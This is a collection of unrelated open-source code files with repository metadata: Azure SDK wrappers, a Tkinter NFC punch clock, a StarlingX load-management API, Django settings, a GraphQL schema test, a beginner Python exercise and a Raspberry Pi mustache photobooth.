71974268d6dd6a8406acbba6b91310ba74815108 | 8,391 | py | Python | sdk/python/pulumi_azure_native/policyinsights/get_remediation_at_management_group.py | pulumi-bot/pulumi-azure-native | f7b9490b5211544318e455e5cceafe47b628e12c | ["Apache-2.0"] | null | null | null | sdk/python/pulumi_azure_native/policyinsights/get_remediation_at_management_group.py | pulumi-bot/pulumi-azure-native | f7b9490b5211544318e455e5cceafe47b628e12c | ["Apache-2.0"] | null | null | null | sdk/python/pulumi_azure_native/policyinsights/get_remediation_at_management_group.py | pulumi-bot/pulumi-azure-native | f7b9490b5211544318e455e5cceafe47b628e12c | ["Apache-2.0"] | null | null | null |
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union
from .. import _utilities, _tables
from . import outputs
__all__ = [
'GetRemediationAtManagementGroupResult',
'AwaitableGetRemediationAtManagementGroupResult',
'get_remediation_at_management_group',
]
@pulumi.output_type
class GetRemediationAtManagementGroupResult:
"""
The remediation definition.
"""
def __init__(__self__, created_on=None, deployment_status=None, filters=None, id=None, last_updated_on=None, name=None, policy_assignment_id=None, policy_definition_reference_id=None, provisioning_state=None, resource_discovery_mode=None, type=None):
if created_on and not isinstance(created_on, str):
raise TypeError("Expected argument 'created_on' to be a str")
pulumi.set(__self__, "created_on", created_on)
if deployment_status and not isinstance(deployment_status, dict):
raise TypeError("Expected argument 'deployment_status' to be a dict")
pulumi.set(__self__, "deployment_status", deployment_status)
if filters and not isinstance(filters, dict):
raise TypeError("Expected argument 'filters' to be a dict")
pulumi.set(__self__, "filters", filters)
if id and not isinstance(id, str):
raise TypeError("Expected argument 'id' to be a str")
pulumi.set(__self__, "id", id)
if last_updated_on and not isinstance(last_updated_on, str):
raise TypeError("Expected argument 'last_updated_on' to be a str")
pulumi.set(__self__, "last_updated_on", last_updated_on)
if name and not isinstance(name, str):
raise TypeError("Expected argument 'name' to be a str")
pulumi.set(__self__, "name", name)
if policy_assignment_id and not isinstance(policy_assignment_id, str):
raise TypeError("Expected argument 'policy_assignment_id' to be a str")
pulumi.set(__self__, "policy_assignment_id", policy_assignment_id)
if policy_definition_reference_id and not isinstance(policy_definition_reference_id, str):
raise TypeError("Expected argument 'policy_definition_reference_id' to be a str")
pulumi.set(__self__, "policy_definition_reference_id", policy_definition_reference_id)
if provisioning_state and not isinstance(provisioning_state, str):
raise TypeError("Expected argument 'provisioning_state' to be a str")
pulumi.set(__self__, "provisioning_state", provisioning_state)
if resource_discovery_mode and not isinstance(resource_discovery_mode, str):
raise TypeError("Expected argument 'resource_discovery_mode' to be a str")
pulumi.set(__self__, "resource_discovery_mode", resource_discovery_mode)
if type and not isinstance(type, str):
raise TypeError("Expected argument 'type' to be a str")
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="createdOn")
def created_on(self) -> str:
"""
The time at which the remediation was created.
"""
return pulumi.get(self, "created_on")
@property
@pulumi.getter(name="deploymentStatus")
def deployment_status(self) -> 'outputs.RemediationDeploymentSummaryResponse':
"""
The deployment status summary for all deployments created by the remediation.
"""
return pulumi.get(self, "deployment_status")
@property
@pulumi.getter
def filters(self) -> Optional['outputs.RemediationFiltersResponse']:
"""
The filters that will be applied to determine which resources to remediate.
"""
return pulumi.get(self, "filters")
@property
@pulumi.getter
def id(self) -> str:
"""
The ID of the remediation.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter(name="lastUpdatedOn")
def last_updated_on(self) -> str:
"""
The time at which the remediation was last updated.
"""
return pulumi.get(self, "last_updated_on")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the remediation.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="policyAssignmentId")
def policy_assignment_id(self) -> Optional[str]:
"""
The resource ID of the policy assignment that should be remediated.
"""
return pulumi.get(self, "policy_assignment_id")
@property
@pulumi.getter(name="policyDefinitionReferenceId")
def policy_definition_reference_id(self) -> Optional[str]:
"""
The policy definition reference ID of the individual definition that should be remediated. Required when the policy assignment being remediated assigns a policy set definition.
"""
return pulumi.get(self, "policy_definition_reference_id")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
"""
The status of the remediation.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="resourceDiscoveryMode")
def resource_discovery_mode(self) -> Optional[str]:
"""
The way resources to remediate are discovered. Defaults to ExistingNonCompliant if not specified.
"""
return pulumi.get(self, "resource_discovery_mode")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the remediation.
"""
return pulumi.get(self, "type")
class AwaitableGetRemediationAtManagementGroupResult(GetRemediationAtManagementGroupResult):
# pylint: disable=using-constant-test
def __await__(self):
if False:
yield self
return GetRemediationAtManagementGroupResult(
created_on=self.created_on,
deployment_status=self.deployment_status,
filters=self.filters,
id=self.id,
last_updated_on=self.last_updated_on,
name=self.name,
policy_assignment_id=self.policy_assignment_id,
policy_definition_reference_id=self.policy_definition_reference_id,
provisioning_state=self.provisioning_state,
resource_discovery_mode=self.resource_discovery_mode,
type=self.type)
def get_remediation_at_management_group(management_group_id: Optional[str] = None,
management_groups_namespace: Optional[str] = None,
remediation_name: Optional[str] = None,
opts: Optional[pulumi.InvokeOptions] = None) -> AwaitableGetRemediationAtManagementGroupResult:
"""
The remediation definition.
API Version: 2019-07-01.
:param str management_group_id: Management group ID.
:param str management_groups_namespace: The namespace for Microsoft Management RP; only "Microsoft.Management" is allowed.
:param str remediation_name: The name of the remediation.
"""
__args__ = dict()
__args__['managementGroupId'] = management_group_id
__args__['managementGroupsNamespace'] = management_groups_namespace
__args__['remediationName'] = remediation_name
if opts is None:
opts = pulumi.InvokeOptions()
if opts.version is None:
opts.version = _utilities.get_version()
__ret__ = pulumi.runtime.invoke('azure-native:policyinsights:getRemediationAtManagementGroup', __args__, opts=opts, typ=GetRemediationAtManagementGroupResult).value
return AwaitableGetRemediationAtManagementGroupResult(
created_on=__ret__.created_on,
deployment_status=__ret__.deployment_status,
filters=__ret__.filters,
id=__ret__.id,
last_updated_on=__ret__.last_updated_on,
name=__ret__.name,
policy_assignment_id=__ret__.policy_assignment_id,
policy_definition_reference_id=__ret__.policy_definition_reference_id,
provisioning_state=__ret__.provisioning_state,
resource_discovery_mode=__ret__.resource_discovery_mode,
type=__ret__.type)
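# Example invocation (hypothetical resource names; a sketch of how the
# exported function might be called from a Pulumi program, not part of the
# generated module):
#
#   remediation = get_remediation_at_management_group(
#       management_group_id="myManagementGroup",
#       management_groups_namespace="Microsoft.Management",
#       remediation_name="myRemediation")
#   pulumi.export("provisioning_state", remediation.provisioning_state)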
| 41.746269 | 254 | 0.685735 |
b3fd65db32486738567a6d6b313d1a2594fbc0b8 | 3,036 | py | Python | Project-NFC Reader/punchclock/punchclock.py | CurtisIreland/electronics | 99b2521bfde49587850ddaf224fa3ae52d55698c | ["CC0-1.0"] | stars: 22 (2018-01-07 .. 2022-03-04) | issues: null | forks: 33 (2016-05-30 .. 2022-03-29)
import Tkinter as tk
import time
import clock_db
class Punchclock:
def __init__(self, master):
self.time1 = ''
self.card_read = ''
self.card_name = ''
self.rdwr_options = {
'targets': ['106A'],
'on-connect': lambda: scan_card(),
}
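        # NOTE: scan_card() is not defined in this file; it is presumably the
        # NFC on-connect handler (nfcpy-style rdwr options) provided by the
        # surrounding project.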
self.master = master
master.title('Punchclock')
master.attributes('-fullscreen', 1)
# master.configure(background="black")
self.clock=tk.Label(master, justify = tk.CENTER, font="Helvetica 32 bold")
self.clock.place(relx=0.2, rely=0.2, relwidth=0.3, relheight=0.15)
# Signin/Signout buttons
# Create bounding frame
self.button_frame=tk.Frame(master, height=150, width=550)
self.button_frame.visible = True
self.button_frame.place(relx=0.25, rely=0.4, width=550, height=150)
self.button_frame.pi = self.button_frame.place_info()
self.button_si=tk.Button(self.button_frame, text="Sign In", command=lambda: self.si_message())
self.button_si.place(x=50, y=50, width=200, height=50)
self.button_so=tk.Button(self.button_frame, text="Sign Out", command=lambda: self.so_message())
self.button_so.place(x=300, y=50, width=200, height=50)
# Line over status
self.canvas = tk.Canvas(master, width=2000, height=4, borderwidth=0, highlightthickness=0)
self.canvas.create_line(0,2,2000,2, fill="black")
self.canvas.place(relx=0.1, rely=0.8, relwidth=0.8, height=4)
#Status line
self.si_status=tk.Label(master, font="Helvetica 32 bold", anchor=tk.NW, text="")
self.si_status.place(relx=0.15, rely=0.81, relwidth=0.70, relheight=0.1)
# Generate buttons
#btnToggle = tk.Button(text="Test Scan", command=lambda: scan_card(0))
#btnToggle.place(x=70, y=150)
self.tick()
self.hide_buttons()
def tick(self):
# get the current local time from the PC
# time2 = time.strftime('%A %B %d, %Y\n%-I:%M:%S %p')
time2 = time.strftime('%A %B %d, %Y\n%H:%M:%S')
# if time string has changed, update it
if time2 != self.time1:
self.time1 = time2
self.clock.config(text=time2)
# calls itself every 200 milliseconds to update the time display as needed
# could use >200 ms, but display gets jerky
self.clock.after(200, lambda: self.tick())
def si_message(self):
check_time = time.strftime('%Y-%m-%d %H:%M:%S')
self.si_status.config(text="Signed in: " + self.card_name + " " + check_time)
clock_data = clock_db.clock_db()
clock_data.checkin(self.card_name, "IN", check_time)
clock_data.close()
self.hide_buttons()
def so_message(self):
check_time = time.strftime('%Y-%m-%d %H:%M:%S')
self.si_status.config(text="Signed out: " + self.card_name + " " + check_time)
clock_data = clock_db.clock_db()
clock_data.checkin(self.card_name, "OUT", check_time)
clock_data.close()
self.hide_buttons()
def hide_buttons(self):
self.button_frame.place_forget()
self.button_frame.visible = not self.button_frame.visible
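    def show_buttons(self):
        # Hypothetical counterpart to hide_buttons(), not in the original
        # file: re-place the frame using the geometry captured in
        # self.button_frame.pi when a card is scanned.
        self.button_frame.place(**self.button_frame.pi)
        self.button_frame.visible = True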
if __name__ == '__main__':
root = tk.Tk()
my_punchclock = Punchclock(root)
    root.mainloop()
| 31.625 | 98 | 0.678195 |
c2c22b1aa45308b344bd8a26b921b0306bc6078d | 11,867 | py | Python | sysinv/sysinv/sysinv/sysinv/api/controllers/v1/load.py | etaivan/stx-config | 281e1f110973f96e077645fb01f67b646fc253cc | ["Apache-2.0"] | stars: null | issues: null | forks: 1 (2021-01-05 .. 2021-01-05)
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2013 UnitedStack Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Copyright (c) 2015-2016 Wind River Systems, Inc.
#
import jsonpatch
import socket
import pecan
import six
from pecan import rest
import wsme
from wsme import types as wtypes
import wsmeext.pecan as wsme_pecan
from sysinv.api.controllers.v1 import base
from sysinv.api.controllers.v1 import collection
from sysinv.api.controllers.v1 import link
from sysinv.api.controllers.v1 import types
from sysinv.api.controllers.v1 import utils
from sysinv.common.constants import ACTIVE_LOAD_STATE
from sysinv.common import constants
from sysinv.common import exception
from sysinv.common import utils as cutils
from sysinv import objects
from sysinv.openstack.common import log
from sysinv.openstack.common.gettextutils import _
from sysinv.openstack.common.rpc import common
LOG = log.getLogger(__name__)
class LoadPatchType(types.JsonPatchType):
@staticmethod
def mandatory_attrs():
return []
class LoadImportType(base.APIBase):
path_to_iso = wtypes.text
path_to_sig = wtypes.text
def __init__(self, **kwargs):
self.fields = ['path_to_iso', 'path_to_sig']
for k in self.fields:
setattr(self, k, kwargs.get(k))
class Load(base.APIBase):
"""API representation of a Load
This class enforces type checking and value constraints, and converts
between the internal object model and the API representation of an
Load.
"""
id = int
"The id of the Load"
uuid = types.uuid
"Unique UUID for this Load"
state = wtypes.text
"Represents the current state of the Load"
software_version = wtypes.text
"Represents the software version of the Load"
compatible_version = wtypes.text
"Represents the compatible version of the Load"
required_patches = wtypes.text
"A list of the patches required to upgrade to this load"
def __init__(self, **kwargs):
self.fields = objects.load.fields.keys()
for k in self.fields:
setattr(self, k, kwargs.get(k))
@classmethod
def convert_with_links(cls, rpc_load, expand=True):
load = Load(**rpc_load.as_dict())
load_fields = ['id', 'uuid', 'state', 'software_version',
'compatible_version', 'required_patches'
]
if not expand:
load.unset_fields_except(load_fields)
load.links = [link.Link.make_link('self', pecan.request.host_url,
'loads', load.uuid),
link.Link.make_link('bookmark',
pecan.request.host_url,
'loads', load.uuid, bookmark=True)
]
return load
class LoadCollection(collection.Collection):
"""API representation of a collection of Load objects."""
loads = [Load]
"A list containing Load objects"
def __init__(self, **kwargs):
self._type = 'loads'
@classmethod
def convert_with_links(cls, rpc_loads, limit, url=None,
expand=False, **kwargs):
collection = LoadCollection()
collection.loads = [Load.convert_with_links(p, expand)
for p in rpc_loads]
collection.next = collection.get_next(limit, url=url, **kwargs)
return collection
LOCK_NAME = 'LoadController'
class LoadController(rest.RestController):
"""REST controller for Loads."""
_custom_actions = {
'detail': ['GET'],
'import_load': ['POST'],
}
def __init__(self):
self._api_token = None
def _get_loads_collection(self, marker, limit, sort_key, sort_dir,
expand=False, resource_url=None):
limit = utils.validate_limit(limit)
sort_dir = utils.validate_sort_dir(sort_dir)
marker_obj = None
if marker:
marker_obj = objects.load.get_by_uuid(
pecan.request.context,
marker)
loads = pecan.request.dbapi.load_get_list(
limit, marker_obj,
sort_key=sort_key,
sort_dir=sort_dir)
return LoadCollection.convert_with_links(loads, limit,
url=resource_url,
expand=expand,
sort_key=sort_key,
sort_dir=sort_dir)
@wsme_pecan.wsexpose(LoadCollection, types.uuid, int, wtypes.text,
wtypes.text)
def get_all(self, marker=None, limit=None, sort_key='id', sort_dir='asc'):
"""Retrieve a list of loads."""
return self._get_loads_collection(marker, limit, sort_key, sort_dir)
@wsme_pecan.wsexpose(LoadCollection, types.uuid, int, wtypes.text,
wtypes.text)
def detail(self, marker=None, limit=None, sort_key='id', sort_dir='asc'):
"""Retrieve a list of loads with detail."""
parent = pecan.request.path.split('/')[:-1][-1]
if parent != "loads":
raise exception.HTTPNotFound
expand = True
resource_url = '/'.join(['loads', 'detail'])
return self._get_loads_collection(marker, limit, sort_key, sort_dir,
expand, resource_url)
@wsme_pecan.wsexpose(Load, six.text_type)
def get_one(self, load_uuid):
"""Retrieve information about the given Load."""
rpc_load = objects.load.get_by_uuid(
pecan.request.context, load_uuid)
return Load.convert_with_links(rpc_load)
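    # Example request against this endpoint (hypothetical host and UUID; a
    # sketch of the pecan-generated route, not part of the original file):
    #
    #   GET http://<sysinv-api-host>:6385/v1/loads/<load_uuid>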
@staticmethod
def _new_load_semantic_checks(load):
if not load['software_version']:
raise wsme.exc.ClientSideError(
_("Load missing software_version key"))
if load['state']:
raise wsme.exc.ClientSideError(
_("Can not set state during create"))
@cutils.synchronized(LOCK_NAME)
@wsme_pecan.wsexpose(Load, body=Load)
def post(self, load):
"""Create a new Load."""
        # This method is only used to populate the initial load for the system
# This is invoked during config_controller
# Loads after the first are added via import
loads = pecan.request.dbapi.load_get_list()
if loads:
raise wsme.exc.ClientSideError(_("Aborting. Active load exits."))
patch = load.as_dict()
self._new_load_semantic_checks(patch)
patch['state'] = ACTIVE_LOAD_STATE
try:
new_load = pecan.request.dbapi.load_create(patch)
# Controller-0 is added to the database before we add this load
# so we must add a host_upgrade entry for (at least) controller-0
hosts = pecan.request.dbapi.ihost_get_list()
for host in hosts:
values = dict()
values['forihostid'] = host.id
values['software_load'] = new_load.id
values['target_load'] = new_load.id
pecan.request.dbapi.host_upgrade_create(host.id,
new_load.software_version,
values)
except exception.SysinvException as e:
LOG.exception(e)
raise wsme.exc.ClientSideError(_("Invalid data"))
return load.convert_with_links(new_load)
@wsme_pecan.wsexpose(Load, body=LoadImportType)
def import_load(self, body):
"""Create a new Load."""
# Only import loads on controller-0. This is required because the load
# is only installed locally and we will be booting controller-1 from
# this load during the upgrade.
if socket.gethostname() != constants.CONTROLLER_0_HOSTNAME:
raise wsme.exc.ClientSideError(_(
"load-import rejected: A load can only be imported "
"when %s is active." % constants.CONTROLLER_0_HOSTNAME))
import_data = body.as_dict()
path_to_iso = import_data['path_to_iso']
path_to_sig = import_data['path_to_sig']
try:
new_load = pecan.request.rpcapi.start_import_load(
pecan.request.context, path_to_iso, path_to_sig)
except common.RemoteError as e:
# Keep only the message raised originally by sysinv conductor.
raise wsme.exc.ClientSideError(str(e.value))
if new_load is None:
raise wsme.exc.ClientSideError(
_("Error importing load. Load not found"))
try:
pecan.request.rpcapi.import_load(
pecan.request.context, path_to_iso, new_load)
except common.RemoteError as e:
# Keep only the message raised originally by sysinv conductor.
raise wsme.exc.ClientSideError(str(e.value))
return Load.convert_with_links(new_load)
@cutils.synchronized(LOCK_NAME)
@wsme.validate(six.text_type, [LoadPatchType])
@wsme_pecan.wsexpose(Load, six.text_type,
body=[LoadPatchType])
def patch(self, load_id, patch):
"""Update an existing load."""
# TODO (dsulliva)
# This is a stub. We will need to place reasonable limits on what can
# be patched as we add to the upgrade system. This portion of the API
# likely will not be publicly accessible.
rpc_load = objects.load.get_by_uuid(pecan.request.context, load_id)
utils.validate_patch(patch)
patch_obj = jsonpatch.JsonPatch(patch)
try:
load = Load(**jsonpatch.apply_patch(rpc_load.as_dict(), patch_obj))
except utils.JSONPATCH_EXCEPTIONS as e:
raise exception.PatchError(patch=patch, reason=e)
fields = objects.load.fields
for field in fields:
if rpc_load[field] != getattr(load, field):
rpc_load[field] = getattr(load, field)
rpc_load.save()
return Load.convert_with_links(rpc_load)
@cutils.synchronized(LOCK_NAME)
@wsme_pecan.wsexpose(None, six.text_type, status_code=204)
def delete(self, load_id):
"""Delete a load."""
load = pecan.request.dbapi.load_get(load_id)
# make sure the load isn't in use by an upgrade
try:
upgrade = pecan.request.dbapi.software_upgrade_get_one()
except exception.NotFound:
pass
else:
if load.id == upgrade.to_load or load.id == upgrade.from_load:
raise wsme.exc.ClientSideError(
_("Unable to delete load, load in use by upgrade"))
# make sure the load isn't used by any hosts
hosts = pecan.request.dbapi.host_upgrade_get_list()
for host in hosts:
if host.target_load == load.id or host.software_load == load.id:
raise wsme.exc.ClientSideError(_(
"Unable to delete load, load in use by host (id: %s)")
% host.forihostid)
cutils.validate_load_for_delete(load)
pecan.request.rpcapi.delete_load(pecan.request.context, load_id)
| 34.100575 | 82 | 0.6165 |
72a925c649f9b430faf270d395076c25bb211eea | 4,262 | py | Python | resume/settings.py | KamilJakubczak/Resume | 6c4907f11d50e12efb8d0ea181dd0023fe254753 | ["MIT"] | stars: null | issues: null | forks: null
"""
Django settings for resume project.
Generated by 'django-admin startproject' using Django 3.0.10.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
SECRETS = {
'SECRET_KEY': None,
'DEBUG': None,
'DB_PASS': None,
'DB_NAME': None,
'DB_USER': None,
'DB_HOST': None,
'DB_PORT': None,
'AWS_BUCKET': None,
'AWS_ID': None,
'AWS_KEY': None,
}
# Read each secret from the environment, with a placeholder fallback for Travis CI tests
for secret in SECRETS.keys():
try:
SECRETS[secret] = os.environ[secret]
except KeyError:
SECRETS[secret] = 'travis'
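# One way to seed these values for local development, before Django imports
# this module (placeholder values; a sketch, not part of the original file):
#
#   os.environ.setdefault('SECRET_KEY', 'change-me')
#   os.environ.setdefault('DB_NAME', 'resume')
#   os.environ.setdefault('DB_USER', 'resume')
#   os.environ.setdefault('DB_PASS', 'change-me')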
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = SECRETS['SECRET_KEY']
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = SECRETS['DEBUG']
ALLOWED_HOSTS = ['kamil-jakubczak.herokuapp.com', 'localhost']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'cv',
'frontend',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'whitenoise.middleware.WhiteNoiseMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'resume.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'resume.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': SECRETS['DB_NAME'],
'USER': SECRETS['DB_USER'],
'PASSWORD': SECRETS['DB_PASS'],
'HOST': SECRETS['DB_HOST'],
'PORT': SECRETS['DB_PORT'],
}
}
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATICFILES_DIRS = (
os.path.join(BASE_DIR, 'static'),
)
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
DEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'
AWS_STORAGE_BUCKET_NAME = 'kamil-jakubczak-static'
AWS_S3_REGION_NAME = 'eu-central-1'
# SECURITY WARNING: never commit real AWS credentials; read them from the
# environment via SECRETS like the other values above.
AWS_ACCESS_KEY_ID = SECRETS['AWS_ID']
AWS_SECRET_ACCESS_KEY = SECRETS['AWS_KEY']
| 26.308642 | 91 | 0.691929 |
d6b6581f63724aa0fccaadea572cac66fe861661 | 2,099 | py | Python | tests/functional/regressions/test_issue160.py | matt-koevort/tartiflette | 5777866b133d846ce4f8aa03f735fa81832896cd | ["MIT"] | stars: 530 (2019-06-04 .. 2022-03-31) | issues: 242 (2019-06-04 .. 2022-03-28) | forks: 36 (2019-06-21 .. 2021-11-04)
import pytest
from tartiflette import create_engine
from tartiflette.types.exceptions.tartiflette import GraphQLSchemaError
@pytest.mark.asyncio
async def test_issue160():
with pytest.raises(
GraphQLSchemaError,
match="""
0: Field < F.a > is Invalid: the given Type < G > does not exist!
1: Field < C.a > is missing as defined in the < Bob > Interface.
2: Type < D > implements < Richard > which does not exist!
3: Type < J > implements < F > which is not an interface!
4: Field < K.a > should be of Type < String > as defined in the < Bob > Interface.
5: Missing Query Type < Query >.
6: Missing Mutation Type < MutationType >.
7: Missing Subscription Type < SubscriptionType >.
8: Type < R > has no fields.
9: Union Type < H > contains itself.
10: Scalar < E > is missing an implementation
11: Argument < arg > of Field < L.aField > is of type < LL > which is not a Scalar, an Enum or an InputObject
12: Argument < arg > of Directive < m > is of type < LL > which is not a Scalar, an Enum or an InputObject
13: Field < N.b > is of type < L > which is not a Scalar, an Enum or an InputObject""",
):
await create_engine(
"""
type R
interface Bob {
a: String
}
type C implements Bob {
b: Int
}
type D implements Richard {
e: String
}
type F {
a: G
}
union H = H | F | G
type J implements F {
g: F
}
type K implements Bob {
a: Int
}
schema {
query: Query
mutation: MutationType
subscription: SubscriptionType
}
scalar E
enum I {
TATA
TITI
TOTO
J
}
type LL {
a: String
}
type L {
aField(arg: LL!): Int
}
directive @m(arg: LL!) on SCHEMA
input N {
a: String
b: L
}
""",
schema_name="test_issue160",
)
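# For contrast, a schema that satisfies all of the checks above would build
# without raising (a sketch with an assumed schema name, not part of the
# original test):
#
#   await create_engine(
#       """
#       type Query {
#           hello: String
#       }
#       """,
#       schema_name="test_issue160_valid",
#   )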
| 23.322222 | 109 | 0.5293 |
f690eeb94b80f151d6968d31e21c0385a2443863 | 209 | py | Python | ex12.py | Eithandarphyo51/python-test-exercises | 85d1cbb82fc878315be46d168e5eb0f949c6ded4 | ["MIT"] | stars: null | issues: null | forks: null
age = input("How old are you? ")
height = input("How tall are you? ")
weight = input("How much do you weigh? ")
print(f"So, you're {age} old, {height} tall and {weight} heavy.")
| 34.833333 | 95 | 0.650718 |
8ad1e1185513767643ccdd7d104050df9adaab69 | 2,906 | py | Python | azure-mgmt-network/azure/mgmt/network/v2018_12_01/models/ip_configuration.py | JonathanGailliez/azure-sdk-for-python | f0f051bfd27f8ea512aea6fc0c3212ee9ee0029b | ["MIT"] | stars: 1 (2021-09-07 .. 2021-09-07) | issues: 2 (2019-10-02 .. 2020-10-02) | forks: null
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class IPConfiguration(SubResource):
"""IP configuration.
:param id: Resource ID.
:type id: str
:param private_ip_address: The private IP address of the IP configuration.
:type private_ip_address: str
:param private_ip_allocation_method: The private IP allocation method.
Possible values are 'Static' and 'Dynamic'. Possible values include:
'Static', 'Dynamic'
:type private_ip_allocation_method: str or
~azure.mgmt.network.v2018_12_01.models.IPAllocationMethod
:param subnet: The reference of the subnet resource.
:type subnet: ~azure.mgmt.network.v2018_12_01.models.Subnet
:param public_ip_address: The reference of the public IP resource.
:type public_ip_address:
~azure.mgmt.network.v2018_12_01.models.PublicIPAddress
:param provisioning_state: Gets the provisioning state of the public IP
resource. Possible values are: 'Updating', 'Deleting', and 'Failed'.
:type provisioning_state: str
:param name: The name of the resource that is unique within a resource
group. This name can be used to access the resource.
:type name: str
:param etag: A unique read-only string that changes whenever the resource
is updated.
:type etag: str
"""
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'private_ip_address': {'key': 'properties.privateIPAddress', 'type': 'str'},
'private_ip_allocation_method': {'key': 'properties.privateIPAllocationMethod', 'type': 'str'},
'subnet': {'key': 'properties.subnet', 'type': 'Subnet'},
'public_ip_address': {'key': 'properties.publicIPAddress', 'type': 'PublicIPAddress'},
'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'etag': {'key': 'etag', 'type': 'str'},
}
def __init__(self, **kwargs):
super(IPConfiguration, self).__init__(**kwargs)
self.private_ip_address = kwargs.get('private_ip_address', None)
self.private_ip_allocation_method = kwargs.get('private_ip_allocation_method', None)
self.subnet = kwargs.get('subnet', None)
self.public_ip_address = kwargs.get('public_ip_address', None)
self.provisioning_state = kwargs.get('provisioning_state', None)
self.name = kwargs.get('name', None)
self.etag = kwargs.get('etag', None)
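# Example instantiation with keyword arguments (illustrative values; a
# sketch, not part of the generated SDK module):
#
#   ip_configuration = IPConfiguration(
#       name='ipconfig1',
#       private_ip_address='10.0.0.4',
#       private_ip_allocation_method='Static')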
| 46.126984 | 103 | 0.65554 |
4c9fcb3cca3cc8d9a33f13ba961cbe150227144e | 1,389 | py | Python | showers/pi/examples/ch09/photobooth.py | Playaowl/artworks | bfe2abc844851ce054e1233261364a502cd30561 | ["MIT"] | stars: 1 (2020-08-14 .. 2020-08-14) | issues: null | forks: null
from time import sleep, time
from SimpleCV import Camera, Image, Display
import RPi.GPIO as GPIO
myCamera = Camera(prop_set={'width':320, 'height': 240})
myDisplay = Display(resolution=(320, 240))
stache = Image("mustache.png")
stacheMask = stache.createBinaryMask(color1=(0,0,0), color2=(254,254,254))
stacheMask = stacheMask.invert()
GPIO.setmode(GPIO.BCM)
GPIO.setup(24, GPIO.IN)
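# Pin 24 is read as the shutter button below; the wiring (pull-up or
# pull-down resistor) is assumed, as it is not described in this script.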
def mustachify(frame):
faces = frame.findHaarFeatures('face')
if faces:
for face in faces:
print "Face at: " + str(face.coordinates())
myFace = face.crop()
noses = myFace.findHaarFeatures('nose')
if noses:
nose = noses.sortArea()[-1]
print "Nose at: " + str(nose.coordinates())
xmust = face.points[0][0] + nose.x - (stache.width/2)
ymust = face.points[0][1] + nose.y + (stache.height/3)
else:
return frame
frame = frame.blit(stache, pos=(xmust, ymust), mask=stacheMask)
return frame
else:
return frame
while not myDisplay.isDone():
inputValue = GPIO.input(24)
frame = myCamera.getImage()
    if inputValue:
frame = mustachify(frame)
frame.save("mustache-" + str(time()) + ".jpg")
frame = frame.flipHorizontal()
frame.show()
sleep(3)
else:
frame = frame.flipHorizontal()
frame.save(myDisplay)
        sleep(.05)
| 30.866667 | 74 | 0.62059 |
